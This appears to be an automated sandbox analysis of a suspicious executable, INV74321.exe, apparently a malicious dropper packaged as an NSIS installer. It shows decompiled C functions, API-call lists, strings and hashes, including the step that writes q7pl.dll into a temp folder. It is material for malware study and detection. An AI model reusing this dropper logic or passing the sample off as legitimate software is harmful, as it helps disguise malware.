                                                          0x00403e8f
                                                          0x00403e97
                                                          0x00000000
                                                          0x00403e9d
                                                          0x00403ccb
                                                          0x00403ccb
                                                          0x00403ccf
                                                          0x00403cd4
                                                          0x00403ce3
                                                          0x00403ce3
                                                          0x00403cec
                                                          0x00403cf5
                                                          0x00403d00
                                                          0x00403d00
                                                          0x00403d0c
                                                          0x00403d28
                                                          0x00403d2b
                                                          0x00403d3e
                                                          0x00403d44
                                                          0x00403de7
                                                          0x00000000
                                                          0x00403df0
                                                          0x00403d4a
                                                          0x00403d57
                                                          0x00403d59
                                                          0x00403d5b
                                                          0x00403d7a
                                                          0x00403d7a
                                                          0x00403d7d
                                                          0x00403d82
                                                          0x00403d85
                                                          0x00403d95
                                                          0x00403d96
                                                          0x00403d98
                                                          0x00403dce
                                                          0x00403de1
                                                          0x00000000
                                                          0x00403de1
                                                          0x00403d9a
                                                          0x00403da0
                                                          0x00403db9
                                                          0x00403dbe
                                                          0x00403dc0
                                                          0x00000000
                                                          0x00000000
                                                          0x00403dc2
                                                          0x00403dae
                                                          0x00403dae
                                                          0x00403db0
                                                          0x00403db0
                                                          0x00000000
                                                          0x00403db0
                                                          0x00403da3
                                                          0x00403da8
                                                          0x00000000
                                                          0x00403da8
                                                          0x00403d87
                                                          0x00403d8d
                                                          0x00000000
                                                          0x00000000
                                                          0x00403d8f
                                                          0x00000000
                                                          0x00403d8f
                                                          0x00403d7f
                                                          0x00000000
                                                          0x00403d7f
                                                          0x00403d65
                                                          0x00403d6c
                                                          0x00403d72
                                                          0x00403d74
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403d74
                                                          0x00403d30
                                                          0x00000000
                                                          0x00403d0e
                                                          0x00403d14
                                                          0x00403d1e
                                                          0x00404125
                                                          0x0040412b
                                                          0x0040412d
                                                          0x00404133
                                                          0x00404138
                                                          0x0040413e
                                                          0x0040413e
                                                          0x00404133
                                                          0x00404148
                                                          0x00000000
                                                          0x00404148
                                                          0x00403d0c

                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                          • ShowWindow.USER32(?), ref: 00403D00
                                                          • DestroyWindow.USER32 ref: 00403D14
                                                          • SetWindowLongA.USER32 ref: 00403D30
                                                          • GetDlgItem.USER32 ref: 00403D51
                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                          • GetDlgItem.USER32 ref: 00403E1A
                                                          • GetDlgItem.USER32 ref: 00403E24
                                                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                          • GetDlgItem.USER32 ref: 00403F35
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                          • EnableWindow.USER32(?,?), ref: 00403F68
                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                          • EnableMenuItem.USER32 ref: 00403FA0
                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                          • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                          • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                          • String ID:
                                                          • API String ID: 4050669955-0
                                                          • Opcode ID: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                          • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                          • Opcode Fuzzy Hash: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                          • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040390A, Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E0040390A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f434;
				_t17 = E00406500(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a890;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
					__eflags =  *0x42a890;
					if(__eflags == 0) {
						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406055("1033", _t67 & 0x0000ffff);
				}
				E00403BCF(_t71, _t84);
				_t80 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42f4c0 =  *0x42f43c & 0x00000020;
				 *0x42f4dc = 0x10000;
				if(E00405B7D(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405B7D(_t92, _t80) == 0) {
						E0040618A(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec08 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403BCF(_t71, __eflags);
							__eflags =  *0x42f4e0;
							if( *0x42f4e0 != 0) {
								_t28 = E004052F0(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a870, 5); // executed
							_t34 = E00406492("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E00406492("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebc0);
								 *0x42ebe4 = _t81;
								RegisterClassA(0x42ebc0);
							}
							_t36 =  *0x42ec00; // 0x0
							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0); // executed
							E0040385A(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f420;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebd4 = _t25;
						 *0x42ebe4 = 0x40a1f4;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3c0;
					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
					_t57 =  *0x42e3c0; // 0x47
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3c1;
						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E004060F7(_t80, E00405A8F(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405AD6(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                                                          0x00403910
                                                          0x00403919
                                                          0x00403920
                                                          0x00403922
                                                          0x00403936
                                                          0x00403948
                                                          0x0040394f
                                                          0x00403956
                                                          0x0040395c
                                                          0x00403961
                                                          0x00403967
                                                          0x0040397a
                                                          0x0040397a
                                                          0x00403985
                                                          0x00403924
                                                          0x00403924
                                                          0x0040392f
                                                          0x0040392f
                                                          0x0040398a
                                                          0x00403994
                                                          0x0040399d
                                                          0x004039a2
                                                          0x004039b3
                                                          0x00403a3a
                                                          0x00403a42
                                                          0x00403a4b
                                                          0x00403a4b
                                                          0x00403a61
                                                          0x00403a67
                                                          0x00403a75
                                                          0x00403af6
                                                          0x00403afe
                                                          0x00403b08
                                                          0x00403b0d
                                                          0x00403b13
                                                          0x00403b9d
                                                          0x00403ba2
                                                          0x00403ba4
                                                          0x00403bc0
                                                          0x00000000
                                                          0x00403bc0
                                                          0x00403ba6
                                                          0x00403bac
                                                          0x00403bb4
                                                          0x00403bb4
                                                          0x00000000
                                                          0x00403bac
                                                          0x00403b21
                                                          0x00403b2c
                                                          0x00403b31
                                                          0x00403b33
                                                          0x00403b3a
                                                          0x00403b3a
                                                          0x00403b45
                                                          0x00403b4d
                                                          0x00403b4f
                                                          0x00403b51
                                                          0x00403b5a
                                                          0x00403b5d
                                                          0x00403b63
                                                          0x00403b63
                                                          0x00403b69
                                                          0x00403b82
                                                          0x00403b93
                                                          0x00000000
                                                          0x00403b98
                                                          0x00403b00
                                                          0x00403b02
                                                          0x00000000
                                                          0x00403a77
                                                          0x00403a77
                                                          0x00403a83
                                                          0x00403a8d
                                                          0x00403a93
                                                          0x00403a98
                                                          0x00403aa7
                                                          0x00403bc5
                                                          0x00403bc5
                                                          0x00000000
                                                          0x00403bc5
                                                          0x00403ab6
                                                          0x00403af1
                                                          0x00000000
                                                          0x00403af1
                                                          0x004039b9
                                                          0x004039b9
                                                          0x004039bc
                                                          0x004039be
                                                          0x00000000
                                                          0x00000000
                                                          0x004039c8
                                                          0x004039d8
                                                          0x004039dd
                                                          0x004039e4
                                                          0x00000000
                                                          0x00000000
                                                          0x004039e8
                                                          0x004039ea
                                                          0x004039f7
                                                          0x004039f7
                                                          0x004039ff
                                                          0x00403a05
                                                          0x00403a2d
                                                          0x00403a35
                                                          0x00000000
                                                          0x00403a17
                                                          0x00403a18
                                                          0x00403a21
                                                          0x00403a27
                                                          0x00403a28
                                                          0x00000000
                                                          0x00403a28
                                                          0x00403a23
                                                          0x00403a25
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403a25
                                                          0x00403a05

                                                          APIs
                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                          • GetUserDefaultUILanguage.KERNELBASE(00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV74321.exe" ,00000000), ref: 00403924
                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                          • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV74321.exe" ,00000000), ref: 00403985
                                                          • lstrlenA.KERNEL32(GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74B5FA90), ref: 004039FA
                                                          • lstrcmpiA.KERNEL32(?,.exe,GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                          • GetFileAttributesA.KERNEL32(GHFGHFGHFDGDFGDFg), ref: 00403A18
                                                          • LoadImageA.USER32 ref: 00403A61
                                                          • RegisterClassA.USER32 ref: 00403A9E
                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                          • CreateWindowExA.USER32 ref: 00403AEB
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                          • GetClassInfoA.USER32 ref: 00403B4D
                                                          • GetClassInfoA.USER32 ref: 00403B5A
                                                          • RegisterClassA.USER32 ref: 00403B63
                                                          • DialogBoxParamA.USER32 ref: 00403B82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\INV74321.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GHFGHFGHFDGDFGDFg$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 606308-3028286410
                                                          • Opcode ID: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                          • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                          • Opcode Fuzzy Hash: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                          • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402EA1, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E00402EA1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\hardz\\Desktop\\INV74321.exe";
				 *0x42f430 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\INV74321.exe", 0x400);
				_t89 = E00405C90(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\hardz\\Desktop";
				E004060F7("C:\\Users\\hardz\\Desktop", _t91);
				E004060F7(0x437000, E00405AD6(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x42944c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E3D(1);
					if( *0x42f438 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E00403300( *0x42f438 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030D8(); // executed
						if(_t57 == _v24) {
							 *0x42f434 = _t94;
							 *0x42f43c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f440 =  *0x42f440 + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405C4B(0x42f460, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E00403300( *0x41d440);
					if(E004032EA( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004032EA(0x415440, _t90) == 0) {
							E00402E3D(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f438 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E3D(0);
							}
							goto L20;
						}
						E00405C4B( &_v44, 0x415440, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41d440; // 0x8d79e
							 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x42f438 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t24 = _t80 - 4; // 0x40a194
								_t93 = _t24;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42944c) {
							_v12 = E004065B7(_v12, 0x415440, _t90);
						}
						 *0x41d440 =  *0x41d440 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}




























                                                          0x00402ea9
                                                          0x00402eac
                                                          0x00402eaf
                                                          0x00402eb2
                                                          0x00402eb8
                                                          0x00402ec9
                                                          0x00402ece
                                                          0x00402ee1
                                                          0x00402ee6
                                                          0x00402ee9
                                                          0x00402eef
                                                          0x00000000
                                                          0x00402ef1
                                                          0x00402efc
                                                          0x00402f02
                                                          0x00402f13
                                                          0x00402f1a
                                                          0x00402f22
                                                          0x00402f27
                                                          0x00402f29
                                                          0x00403014
                                                          0x00403016
                                                          0x00403022
                                                          0x00000000
                                                          0x00000000
                                                          0x00403027
                                                          0x0040304b
                                                          0x00403056
                                                          0x00403061
                                                          0x00403066
                                                          0x00403069
                                                          0x0040306a
                                                          0x0040306b
                                                          0x0040306d
                                                          0x00403075
                                                          0x0040308c
                                                          0x00403094
                                                          0x00403099
                                                          0x0040309b
                                                          0x0040309b
                                                          0x004030a3
                                                          0x004030a3
                                                          0x004030a6
                                                          0x004030a7
                                                          0x004030a7
                                                          0x004030aa
                                                          0x004030ac
                                                          0x004030ac
                                                          0x004030b6
                                                          0x004030bc
                                                          0x004030ca
                                                          0x00000000
                                                          0x004030cf
                                                          0x00000000
                                                          0x00403075
                                                          0x0040302f
                                                          0x00403041
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f2f
                                                          0x00402f34
                                                          0x00402f39
                                                          0x00402f3d
                                                          0x00402f44
                                                          0x00402f4b
                                                          0x00402f4d
                                                          0x00402f4d
                                                          0x00402f58
                                                          0x00403080
                                                          0x00403077
                                                          0x00000000
                                                          0x00403077
                                                          0x00402f65
                                                          0x00402fe5
                                                          0x00402fe9
                                                          0x00402fee
                                                          0x00000000
                                                          0x00402fe5
                                                          0x00402f6e
                                                          0x00402f73
                                                          0x00402f7b
                                                          0x00402fa1
                                                          0x00402fa7
                                                          0x00402fb0
                                                          0x00402fb6
                                                          0x00402fbb
                                                          0x00402fc1
                                                          0x00000000
                                                          0x00000000
                                                          0x00402fcb
                                                          0x00402fd3
                                                          0x00402fd6
                                                          0x00402fd6
                                                          0x00402fdb
                                                          0x00402fdd
                                                          0x00402fdd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402fcb
                                                          0x00402fef
                                                          0x00402ff5
                                                          0x00403001
                                                          0x00403001
                                                          0x00403004
                                                          0x0040300a
                                                          0x0040300a
                                                          0x00403012
                                                          0x00000000
                                                          0x00403012

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402EB2
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\INV74321.exe,00000400), ref: 00402ECE
                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\INV74321.exe,80000000,00000003), ref: 00405C94
                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INV74321.exe,C:\Users\user\Desktop\INV74321.exe,80000000,00000003), ref: 00402F1A
                                                          • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\INV74321.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\INV74321.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 2803837635-144457684
                                                          • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                          • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                          • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                          • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 61%
                                                          			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405AFC(_t82);
				_push(_t82);
				_t83 = "GHFGHFGHFDGDFGDFg";
				if(_t33 == 0) {
					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					E004060F7();
				}
				E004063D2(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040646B(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405C6B(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040521E(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4c8;
						goto L32;
					} else {
						E004060F7(0x40ac38, 0x430000);
						E004060F7(0x430000, _t83);
						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\hardz\AppData\Local\Temp\nsi6113.tmp\q7pl.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E004060F7(0x430000, 0x40ac38);
						_t62 = E00405813("C:\Users\hardz\AppData\Local\Temp\nsi6113.tmp\q7pl.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040521E();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040521E(0xffffffea,  *(_t85 - 8));
				 *0x42f4f4 =  *0x42f4f4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E004030D8(); // executed
				 *0x42f4f4 =  *0x42f4f4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405813();
					goto L29;
				}
				goto L33;
			}

















                                                          0x00401759
                                                          0x00401760
                                                          0x00401769
                                                          0x0040176c
                                                          0x0040176f
                                                          0x00401774
                                                          0x00401775
